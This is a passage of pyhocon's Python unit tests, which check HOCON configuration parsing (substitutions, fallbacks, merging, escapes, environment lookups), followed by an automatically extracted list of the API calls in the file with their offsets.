config['database.pass'] == 'test_pass' def test_substitution_flat_override(self): config = ConfigFactory.parse_string( """ database { name = peopledb pass = peoplepass name = ${?NOT_EXISTS} pass = ${?NOT_EXISTS} } """) assert config['database.name'] == 'peopledb' assert config['database.pass'] == 'peoplepass' def test_substitution_multiple_override(self): config = ConfigFactory.parse_string( """ a: 1 b: foo c: ${a} ${b} c: ${b} ${a} d: ${a} ${b} d: ${a} bar """) assert config['c'] == 'foo 1' assert config['d'] == '1 bar' def test_substitution_nested_override(self): config = ConfigFactory.parse_string( """ database { name = peopledb pass = peoplepass } database { name = ${?user} pass = ${?pass} } """) assert config['database.name'] == 'peopledb' assert config['database.pass'] == 'peoplepass' def test_optional_with_merge(self): unresolved = ConfigFactory.parse_string( """ foo: 42 foo: ${?a} """, resolve=False) source = ConfigFactory.parse_string( """ b: 14 """) config = unresolved.with_fallback(source) assert config['foo'] == 42 config = source.with_fallback(unresolved) assert config['foo'] == 42 def test_fallback_with_resolve(self): config3 = ConfigFactory.parse_string("c=5") config2 = ConfigFactory.parse_string("b=${c}", resolve=False) config1 = ConfigFactory.parse_string("a=${b}", resolve=False) \ .with_fallback(config2, resolve=False) \ .with_fallback(config3) assert {'a': 5, 'b': 5, 'c': 5} == config1 def test_optional_substitution(self): config = ConfigFactory.parse_string( """ a = 45 b = ${?c} d = ${?c} 4 e = ${?a} g = ${?c1} ${?c2} h = ${?c1} ${?c2} 1 """) assert 'b' not in config assert config['d'] == 4 assert config['e'] == 45 assert 'g' not in config assert config['h'] == 1 def test_cascade_optional_substitution(self): config = ConfigFactory.parse_string( """ num = 3 retries_msg = You have ${num} retries retries_msg = ${?CUSTOM_MSG} """) assert config == { 'num': 3, 'retries_msg': 'You have 3 retries' } def test_substitution_cycle(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ a = ${b} b = ${c} c = ${a} """) def test_assign_number_with_eol(self): config = ConfigFactory.parse_string( """ a = 4 b = # test # test2 5 c = 6 """ ) assert config['a'] == 4 assert config['b'] == 5 assert config['c'] == 6 def test_assign_int(self): config = ConfigFactory.parse_string( """ short = 12 long = 12321321837612378126213217321 negative = -15 """ ) # on python 3 long will be an int but on python 2 long with be a long assert config['short'] == 12 assert isinstance(config['short'], int) assert config['long'] == 12321321837612378126213217321 assert isinstance(config['negative'], int) assert config['negative'] == -15 def test_assign_float(self): config = ConfigFactory.parse_string( """ a = 121.22 b = -121.22 c = .54 d = -.54 """ ) # on python 3 long will be an int but on python 2 long with be a long assert config['a'] == 121.22 assert config['b'] == -121.22 assert config['c'] == .54 assert config['d'] == -.54 def test_sci_real(self): """ Test scientific expression of number """ config = ConfigFactory.parse_string( """ short = 12.12321 long1 = 121.22E3423432 neg_long1 = 121.22E-1 long2 = 121.22e3423432 neg_long2 = 121.22e-3 """ ) # on python 3 long will be an int but on python 2 long with be a long assert config['short'] == 12.12321 assert config['long1'] == 121.22E3423432 assert config['neg_long1'] == 121.22E-1 assert config['long2'] == 121.22E3423432 assert config['neg_long2'] == 121.22E-3 def test_assign_strings_with_eol(self): config = ConfigFactory.parse_string( """ a = "a" b = # test # test2 "b" c = "c" """ ) assert config['a'] == 'a' assert config['b'] == 'b' assert config['c'] == 'c' def test_assign_list_numbers_with_eol(self): config = ConfigFactory.parse_string( """ a = [ 1, 2, ] b = # test # test2 [ 3, 4,] c = [ 5, 6 ] """ ) assert config['a'] == [1, 2] assert config['b'] == [3, 4] assert config['c'] == [5, 6] def test_assign_list_strings_with_eol(self): config = ConfigFactory.parse_string( """ a = [ "a", "b", ] b = # test # test2 [ "c", "d",] c = [ "e", "f" ] """ ) assert config['a'] == ['a', 'b'] assert config['b'] == ['c', 'd'] assert config['c'] == ['e', 'f'] def test_assign_dict_strings_with_equal_sign_with_eol(self): config = ConfigFactory.parse_string( """ a = { a: 1, b: 2, } b = # test # test2 { c: 3, d: 4,} c = { e: 5, f: 6 } """ ) assert config['a'] == {'a': 1, 'b': 2} assert config['b'] == {'c': 3, 'd': 4} assert config['c'] == {'e': 5, 'f': 6} def test_assign_dict_strings_no_equal_sign_with_eol(self): config = ConfigFactory.parse_string( """ a { a: 1, b: 2, } b # test # test2 { c: 3, d: 4,} c { e: 5, f: 6 } """ ) assert config['a'] == {'a': 1, 'b': 2} assert config['b'] == {'c': 3, 'd': 4} assert config['c'] == {'e': 5, 'f': 6} def test_substitutions_overwrite(self): config1 = ConfigFactory.parse_string( """ a = 123 a = ${?test} a = 5 """ ) assert config1['a'] == 5 config2 = ConfigFactory.parse_string( """ { database { host = "localhost" port = 8000 url = ${database.host}":"${database.port} } database { host = ${?DB_HOST} } database { host = "other.host.net" port = 433 } } """ ) assert config2['database']['host'] == 'other.host.net' assert config2['database']['port'] == 433 assert config2['database']['url'] == 'other.host.net:433' def test_fallback_substitutions_overwrite(self): config1 = ConfigFactory.parse_string( """ a = { b: 1 c: 2 } """ ) config2 = ConfigFactory.parse_string( """ a.b = 4 a.d = 3 """ ) config3 = config1.with_fallback(config2) assert config3['a'] == { 'b': 1, 'c': 2, 'd': 3 } config4 = ConfigFactory.parse_string( """ name: foo """ ) config5 = ConfigFactory.parse_string( u""" longName: "long "${?name} """, resolve=False ) config6 = config4.with_fallback(config5) assert config6 == { 'longName': 'long foo', 'name': 'foo' } def test_fallback_substitutions_overwrite_file(self): config1 = ConfigFactory.parse_string( """ { data-center-generic = { cluster-size: 8 } misc = "mist" } """ ) # use unicode path here for regression testing https://github.com/chimpler/pyhocon/issues/44 config2 = config1.with_fallback(u'samples/aws.conf') assert config2 == { 'data-center-generic': {'cluster-size': 8}, 'data-center-east': {'cluster-size': 8, 'name': 'east'}, 'misc': 'mist', 'default-jvm-opts': ['-XX:+UseParNewGC'], 'large-jvm-opts': ['-XX:+UseParNewGC', '-Xm16g'] } def test_fallback_self_ref_substitutions_append(self): config1 = ConfigFactory.parse_string( """ list = [ 1, 2, 3 ] """ ) config2 = ConfigFactory.parse_string( """ list = ${list} [ 4, 5, 6 ] """, resolve=False ) config2 = config2.with_fallback(config1) assert config2.get("list") == [1, 2, 3, 4, 5, 6] def test_fallback_self_ref_substitutions_append_plus_equals(self): config1 = ConfigFactory.parse_string( """ list = [ 1, 2, 3 ] """ ) config2 = ConfigFactory.parse_string( """ list += [ 4, 5, 6 ] """, resolve=False ) config2 = config2.with_fallback(config1) assert config2.get("list") == [1, 2, 3, 4, 5, 6] def test_self_merge_ref_substitutions_object(self): config1 = ConfigFactory.parse_string( """ a : { } b : 1 c : ${a} { d : [ ${b} ] } """, resolve=False ) config2 = ConfigFactory.parse_string( """ e : ${a} { } """, resolve=False ) merged = ConfigTree.merge_configs(config1, config2) ConfigParser.resolve_substitutions(merged) assert merged.get("c.d") == [1] def test_self_merge_ref_substitutions_object2(self): config1 = ConfigFactory.parse_string( """ x : { v1: 1 } b1 : {v2: 2 } b = [${b1}] """, resolve=False ) config2 = ConfigFactory.parse_string( """ b2 : ${x} {v2: 3} b += [${b2}] """, resolve=False ) merged = ConfigTree.merge_configs(config1, config2) ConfigParser.resolve_substitutions(merged) b = merged.get("b") assert len(b) == 2 assert b[0] == {'v2': 2} assert b[1] == {'v1': 1, 'v2': 3} def test_self_merge_ref_substitutions_object3(self): config1 = ConfigFactory.parse_string( """ b1 : { v1: 1 } b = [${b1}] """, resolve=False ) config2 = ConfigFactory.parse_string( """ b1 : { v1: 2, v2: 3 } """, resolve=False ) merged = ConfigTree.merge_configs(config1, config2) ConfigParser.resolve_substitutions(merged) assert merged.get("b1") == {"v1": 2, "v2": 3} b = merged.get("b") assert len(b) == 1 assert b[0] == {"v1": 2, "v2": 3} def test_fallback_self_ref_substitutions_merge(self): config1 = ConfigFactory.parse_string( """ dict = { x: 1 } """ ) config2 = ConfigFactory.parse_string( """ dict = ${dict} { y: 2 } """, resolve=False ) config2 = config2.with_fallback(config1) assert config2.get("dict") == {'x': 1, 'y': 2} def test_fallback_self_ref_substitutions_concat_string(self): config1 = ConfigFactory.parse_string( """ string = abc """ ) config2 = ConfigFactory.parse_string( """ string = ${string}def """, resolve=False ) result = config2.with_fallback(config1) assert result.get("string") == 'abcdef' # test no mutation on config1 assert result is not config1 # test no mutation on config2 assert "abc" not in str(config2) def test_fallback_non_root(self): root = ConfigFactory.parse_string( """ a = 1 mid.b = 1 """ ) config = root.get_config("mid").with_fallback(root) assert config['a'] == 1 and config['b'] == 1 def test_object_field_substitution(self): config = ConfigFactory.parse_string( """ A = ${Test} Test { field1 = 1 field2 = ${Test.field1}"2" field3 = ${Test.field2}"3" } """ ) assert config.get_string("A.field1") == "1" assert config.get_string("A.field2") == "12" assert config.get_string("A.field3") == "123" assert config.get_string("Test.field1") == "1" assert config.get_string("Test.field2") == "12" assert config.get_string("Test.field3") == "123" def test_one_line_quote_escape(self): config = ConfigFactory.parse_string( """ test_no_quotes: abc\\n\\n test_quotes: "abc\\n\\n" """ ) assert config == { 'test_no_quotes': 'abc\n\n', 'test_quotes': 'abc\n\n' } def test_multi_line_escape(self): config = ConfigFactory.parse_string( """ with-escaped-backslash: \"\"\" \\\\ \"\"\" with-newline-escape-sequence: \"\"\" \\n \"\"\" with-escaped-newline-escape-sequence: \"\"\" \\\\n \"\"\" """ ) assert config['with-escaped-backslash'] == '\n\\\\\n' assert config['with-newline-escape-sequence'] == '\n\\n\n' assert config['with-escaped-newline-escape-sequence'] == '\n\\\\n\n' def test_multiline_with_backslash(self): config = ConfigFactory.parse_string( """ test = line1 \ line2 test2 = test """) assert config == { 'test': 'line1 line2', 'test2': 'test' } def test_from_dict_with_dict(self): d = { 'banana': 3, 'apple': 4, 'pear': 1, 'orange': 2, } config = ConfigFactory.from_dict(d) assert config == d def test_from_dict_with_ordered_dict(self): d = OrderedDict() d['banana'] = 3 d['apple'] = 4 d['pear'] = 1 d['orange'] = 2 config = ConfigFactory.from_dict(d) assert config == d def test_from_dict_with_nested_dict(self): d = OrderedDict() d['banana'] = 3 d['apple'] = 4 d['pear'] = 1 d['tree'] = { 'a': 'abc\ntest\n', 'b': [1, 2, 3] } config = ConfigFactory.from_dict(d) assert config == d def test_object_concat(self): config = ConfigFactory.parse_string( """o1 = { foo : { a : 1 b : 2 } } o2 = { foo : { b : 3 c : 4 } } o3 = ${o1} ${o2} """ ) assert config.get_int('o1.foo.b') == 2 assert config.get_int('o2.foo.b') == 3 assert config.get_int('o3.foo.b') == 3 assert config.get_int('o1.foo.c', default=42) == 42 assert config.get_int('o3.foo.a') == 1 assert config.get_int('o3.foo.c') == 4 def test_issue_75(self): config = ConfigFactory.parse_string( """base : { bar: ["a"] } sub : ${base} { baz: ${base.bar} ["b"] } sub2: ${sub} """ ) assert config.get_list('base.bar') == ["a"] assert config.get_list('sub.baz') == ["a", "b"] assert config.get_list('sub2.baz') == ["a", "b"] def test_plain_ordered_dict(self): config = ConfigFactory.parse_string( """ e : ${a} { } """, resolve=False ) with pytest.raises(ConfigException): config.as_plain_ordered_dict() def test_quoted_strings_with_ws(self): config = ConfigFactory.parse_string( """ no_trailing_ws = "foo" "bar " trailing_ws = "foo" "bar "{ws} trailing_ws_with_comment = "foo" "bar "{ws}// comment """.format(ws=' ')) assert config == { 'no_trailing_ws': "foo bar ", 'trailing_ws': "foo bar ", 'trailing_ws_with_comment': "foo bar " } def test_unquoted_strings_with_ws(self): config = ConfigFactory.parse_string( """ a = foo bar """) assert config == { 'a': 'foo bar' } def test_quoted_unquoted_strings_with_ws(self): config = ConfigFactory.parse_string( """ a = foo "bar" dummy """) assert config == { 'a': 'foo bar dummy' } def test_quoted_unquoted_strings_with_ws_substitutions(self): config = ConfigFactory.parse_string( """ x = 5 b = test a = foo "bar" ${b} dummy c = foo ${x} bv d = foo ${x} 43 """) assert config == { 'x': 5, 'b': 'test', 'a': 'foo bar test dummy', 'c': 'foo 5 bv', 'd': 'foo 5 43' } def test_complex_substitutions(self): config = ConfigFactory.parse_string( """ a: 1 b: ${c} { pa: [${a}] pb: ${b.pa} } c: { } d: { pc: ${b.pa} } e: ${b} """, resolve=True) assert config == { 'a': 1, 'b': {'pa': [1], 'pb': [1]}, 'c': {}, 'd': {'pc': [1]}, 'e': {'pa': [1], 'pb': [1]} } def test_assign_next_line(self): config = ConfigFactory.parse_string( """ a = // abc abc c = 5 """) assert config == { 'a': 'abc', 'c': 5 } @mock.patch.dict(os.environ, STRING_VAR='value_from_environment') def test_string_from_environment(self): config = ConfigFactory.parse_string( """ string_from_env = ${STRING_VAR} """) assert config == { 'string_from_env': 'value_from_environment' } @mock.patch.dict(os.environ, STRING_VAR='value_from_environment') def test_string_from_environment_self_ref(self): config = ConfigFactory.parse_string( """ STRING_VAR = ${STRING_VAR} """) assert config == { 'STRING_VAR': 'value_from_environment' } @mock.patch.dict(os.environ, STRING_VAR='value_from_environment') def test_string_from_environment_self_ref_optional(self): config = ConfigFactory.parse_string( """ STRING_VAR = ${?STRING_VAR} """) assert config == { 'STRING_VAR': 'value_from_environment' } @mock.patch.dict(os.environ, TRUE_OR_FALSE='false') def test_bool_from_environment(self): config = ConfigFactory.parse_string( """ bool_from_env = ${TRUE_OR_FALSE} """) assert config == { 'bool_from_env': 'false' } assert config.get_bool('bool_from_env') is False @mock.patch.dict(os.environ, INT_VAR='5') def test_int_from_environment(self): config = ConfigFactory.parse_string( """ int_from_env = ${INT_VAR} """) assert config == { 'int_from_env': '5' } assert config.get_int('int_from_env') == 5 def test_unicode_dict_key(self): input_string = u""" www.sample.com { us { name = "first domain" } } www.example-ö.com { us { name = "second domain" } } """ config = ConfigFactory.parse_string(input_string) assert config.get_string(u'www.sample.com.us.name') == 'first domain' assert config.get_string(u'www.example-ö.com.us.name') == 'second domain' with pytest.raises(ConfigWrongTypeException): config.put(u'www.example-ö', 'append_failure', append=True) with pytest.raises(ConfigMissingException): config.get_string(u'missing_unicode_key_ö') with pytest.raises(ConfigException): config.get_bool(u'www.example-ö.com.us.name') with pytest.raises(ConfigException): config.get_list(u'www.example-ö.com.us.name') with pytest.raises(ConfigException): config.get_config(u'www.example-ö.com.us.name') with pytest.raises(ConfigWrongTypeException): config.get_string(u'www.example-ö.com.us.name.missing') def test_with_comment_on_last_line(self): # Adress issue #102 config_tree = ConfigFactory.parse_string(""" foo: "1" bar: "2" # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!""") assert config_tree == { 'foo': '1', 'bar': '2' } def test_triple_quotes_same_line(self): config_tree = ConfigFactory.parse_string('a:["""foo"""", "bar"]') assert config_tree == { 'a': ['foo"', "bar"] } def test_pop(self): config_tree = ConfigFactory.parse_string('a:{b: 3, d: 6}') assert 3 == config_tree.pop('a.b', 5) assert 5 == config_tree.pop('a.c', 5) expected = { 'a': {'d': 6} } assert expected == config_tree def test_merge_overriden(self): # Adress issue #110 # ConfigValues must merge with its .overriden_value # if both are ConfigTree config_tree = ConfigFactory.parse_string(""" foo: ${bar} foo: ${baz} bar: {r: 1, s: 2} baz: {s: 3, t: 4} """) assert 'r' in config_tree['foo'] and 't' in config_tree['foo'] and config_tree['foo']['s'] == 3 def test_attr_syntax(self): config = ConfigFactory.parse_string( """ a: 1 b: { pb: 5 } """) assert 5 == config.b.pb def test_escape_quote(self): config = ConfigFactory.parse_string( """ quoted: "abc\\"test" unquoted: abc\\"test """) assert 'abc"test' == config['quoted'] assert 'abc"test' == config['unquoted'] def test_escape_quote_complex(self): config = ConfigFactory.parse_string( """ value: "{\\"critical\\":\\"0.00\\",\\"warning\\":\\"99.99\\"}" """ ) assert '{"critical":"0.00","warning":"99.99"}' == config['value'] def test_keys_with_slash(self): config = ConfigFactory.parse_string( """ /abc/cde1: abc "/abc/cde2": "cde" /abc/cde3: "fgh" """) assert 'abc' == config['/abc/cde1'] assert 'cde' == config['/abc/cde2'] assert 'fgh' == config['/abc/cde3'] def test_mutation_values(self): config = ConfigFactory.parse_string( """ common : { } b1 = [] var = "wrong" compilerCommon : ${common} { VAR : ${var} } substrate-suite: { VAR : "right" } b1 = [ ${compilerCommon} ${substrate-suite} ${compilerCommon} ${substrate-suite} ] b2 = [ ${compilerCommon} ${substrate-suite} ${compilerCommon} ${substrate-suite} ] """) assert config.get("b1")[1]['VAR'] == 'right' assert config.get("b2")[1]['VAR'] == 'right' def test_escape_sequences_json_equivalence(self): """ Quoted strings are in the same format as JSON strings, See: https://github.com/lightbend/config/blob/master/HOCON.md#unchanged-from-json """ source = r""" { "plain-backslash": "\\", "tab": "\t", "no-tab": "\\t", "newline": "\n", "no-newline": "\\n", "cr": "\r", "no-cr": "\\r", "windows": "c:\\temp" } """ expected = { 'plain-backslash': '\\', 'tab': '\t', 'no-tab': '\\t', 'newline': '\n', 'no-newline': '\\n', 'cr': '\r', 'no-cr': '\\r', 'windows': 'c:\\temp', } config = ConfigFactory.parse_string(source) assert config == expected assert config == json.loads(source) try: from dateutil.relativedelta import relativedelta @pytest.mark.parametrize('data_set', [ ('a: 1 months', relativedelta(months=1)), ('a: 1months', relativedelta(months=1)), ('a: 2 month', relativedelta(months=2)), ('a: 3 mo', relativedelta(months=3)), ('a: 3mo', relativedelta(months=3)), ('a: 3 mon', '3 mon'), ('a: 1 years', relativedelta(years=1)), ('a: 1years', relativedelta(years=1)), ('a: 2 year', relativedelta(years=2)), ('a: 3 y', relativedelta(years=3)), ('a: 3y', relativedelta(years=3)), ]) def test_parse_string_with_duration_optional_units(data_set): config = ConfigFactory.parse_string(data_set[0]) assert config['a'] == data_set[1] except Exception: pass
[((2066, 2153), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', "['+', '`', '^', '?', '!', '@', '*', '&']"], {}), "('forbidden_char', ['+', '`', '^', '?', '!', '@',\n '*', '&'])\n", (2089, 2153), False, 'import pytest\n'), ((2350, 2403), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', '[\'$\', \'"\']'], {}), '(\'forbidden_char\', [\'$\', \'"\'])\n', (2373, 2403), False, 'import pytest\n'), ((2611, 2698), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', "['+', '`', '^', '?', '!', '@', '*', '&']"], {}), "('forbidden_char', ['+', '`', '^', '?', '!', '@',\n '*', '&'])\n", (2634, 2698), False, 'import pytest\n'), ((62340, 62404), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (62355, 62404), False, 'import mock\n'), ((62670, 62734), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (62685, 62734), False, 'import mock\n'), ((62999, 63063), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (63014, 63063), False, 'import mock\n'), ((63338, 63388), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'TRUE_OR_FALSE': '"""false"""'}), "(os.environ, TRUE_OR_FALSE='false')\n", (63353, 63388), False, 'import mock\n'), ((63691, 63731), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'INT_VAR': '"""5"""'}), "(os.environ, INT_VAR='5')\n", (63706, 63731), False, 'import mock\n'), ((696, 1177), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""t = {\n c = 5\n "d" = true\n e.y = {\n f: 7\n g: "hey dude!"\n h: hey man\n i = ""\\"\n "first line"\n "second" line\n ""\\"\n }\n j = [1, 2, 3]\n u = 192.168.1.3/32\n g = null\n }\n """'], {}), '(\n """t = {\n c = 5\n "d" = true\n e.y = {\n f: 7\n g: "hey dude!"\n h: hey man\n i = ""\\"\n "first line"\n "second" line\n ""\\"\n }\n j = [1, 2, 3]\n u = 192.168.1.3/32\n g = null\n }\n """\n )\n', (722, 1177), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((2997, 3146), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: 5\n }\n }\n """'], {}), '(\n """\n {\n a: {\n b: 5\n }\n }\n """\n )\n', (3023, 3146), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5001, 5040), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['data_set[0]'], {}), '(data_set[0])\n', (5027, 5040), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5169, 5288), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: foo\n b: 10 weeks\n c: bar\n """'], {}), '(\n """\n a: foo\n b: 10 weeks\n c: bar\n """\n )\n', (5195, 5288), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5448, 5587), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: foo\n b: [a, 1, 10 weeks, 5 minutes,]\n c: bar\n """'], {}), '(\n """\n a: foo\n b: [a, 1, 10 weeks, 5 minutes,]\n c: bar\n """\n )\n', (5474, 5587), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5750, 5789), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""[1, 2, 3]"""'], {}), "('[1, 2, 3]')\n", (5776, 5789), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5884, 6113), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n "a.b.c.d": 3\n t {\n "d": {\n "c": 5\n }\n }\n k {\n "b.f.d": 7\n }\n """'], {}), '(\n """\n "a.b.c.d": 3\n t {\n "d": {\n "c": 5\n }\n }\n k {\n "b.f.d": 7\n }\n """\n )\n', (5910, 6113), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((6302, 6493), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n b = foo\n c = bar\n }\n a.c = ${a.b}" "${a.b}\n a.d = baz\n """'], {}), '(\n """\n a {\n b = foo\n c = bar\n }\n a.c = ${a.b}" "${a.b}\n a.d = baz\n """\n )\n', (6328, 6493), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((6685, 6906), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a=1,\n b="abc",\n c=the man,\n d=woof,\n a-b-c-d=test,\n a b c d=test2,\n "a b c d e"=test3\n """'], {}), '(\n """\n a=1,\n b="abc",\n c=the man,\n d=woof,\n a-b-c-d=test,\n a b c d=test2,\n "a b c d e"=test3\n """\n )\n', (6711, 6906), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((7274, 7784), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n d {\n g.h.j.u: 5\n g {\n h.d: 4\n }\n g.h.k: f d\n }\n\n h.i.m = 7\n h.i {\n d: 5\n }\n\n h.i {\n e:65\n }\n }\n """'], {}), '(\n """\n a {\n d {\n g.h.j.u: 5\n g {\n h.d: 4\n }\n g.h.k: f d\n }\n\n h.i.m = 7\n h.i {\n d: 5\n }\n\n h.i {\n e:65\n }\n }\n """\n )\n', (7300, 7784), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((8473, 9026), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n // comment 1\n # comment 2\n {\n c = test // comment 0\n g = 6 test # comment 0\n # comment 3\n a: { # comment 4\n b: test, # comment 5\n } # comment 6\n t = [1, # comment 7\n 2, # comment 8\n 3, # comment 9\n ]\n } # comment 10\n // comment 11\n // comment 12\n """'], {}), '(\n """\n // comment 1\n # comment 2\n {\n c = test // comment 0\n g = 6 test # comment 0\n # comment 3\n a: { # comment 4\n b: test, # comment 5\n } # comment 6\n t = [1, # comment 7\n 2, # comment 8\n 3, # comment 9\n ]\n } # comment 10\n // comment 11\n // comment 12\n """\n )\n', (8499, 9026), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9314, 9379), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 5\n """'], {}), '("""\n a = 5\n """)\n', (9340, 9379), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9581, 9677), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = null\n b = [null]\n """'], {}), '(\n """\n a = null\n b = [null]\n """)\n', (9607, 9677), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9829, 10122), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n a.b {\n c = 7\n d = 8\n }\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n a.b {\n c = 7\n d = 8\n }\n }\n """\n )\n', (9855, 10122), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10266, 10433), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: {b: 1}\n a: {c: 2}\n b: {c: 3} {d: 4} {\n c: 5\n }\n """'], {}), '(\n """\n a: {b: 1}\n a: {c: 2}\n b: {c: 3} {d: 4} {\n c: 5\n }\n """\n )\n', (10292, 10433), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10650, 10769), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = a b c\n b = 5 b\n c = b 7\n """'], {}), '(\n """\n a = a b c\n b = 5 b\n c = b 7\n """\n )\n', (10676, 10769), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10955, 11091), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = [1, 2] [3, 4] [\n 5,\n 6\n ]\n """'], {}), '(\n """\n a = [1, 2] [3, 4] [\n 5,\n 6\n ]\n """\n )\n', (10981, 11091), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11256, 11294), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = 45\n"""'], {}), "('a = 45\\n')\n", (11282, 11294), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11682, 11983), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = ${a.b.c}\n f = ${a.b.e}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = ${a.b.c}\n f = ${a.b.e}\n }\n """\n )\n', (11708, 11983), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((12149, 12462), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c}\n f = test ${a.b.e}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c}\n f = test ${a.b.e}\n }\n """\n )\n', (12175, 12462), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((12640, 12962), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['u"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c} me\n f = test ${a.b.e} me\n }\n """'], {}), '(\n u"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c} me\n f = test ${a.b.e} me\n }\n """\n )\n', (12666, 12962), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13202, 13431), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n app.heap_size = 128\n app.java_opts = [\n -Xms${app.heap_size}m\n -Xmx${app.heap_size}m\n ]\n """'], {}), '(\n """\n app.heap_size = 128\n app.java_opts = [\n -Xms${app.heap_size}m\n -Xmx${app.heap_size}m\n ]\n """\n )\n', (13228, 13431), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13607, 13837), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = ${a.b.c}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = ${a.b.c}\n }\n """\n )\n', (13633, 13837), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13948, 14183), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c}\n }\n """\n )\n', (13974, 14183), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((14301, 14539), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c} me\n }\n """'], {}), '(\n """\n {\n a: {\n b: 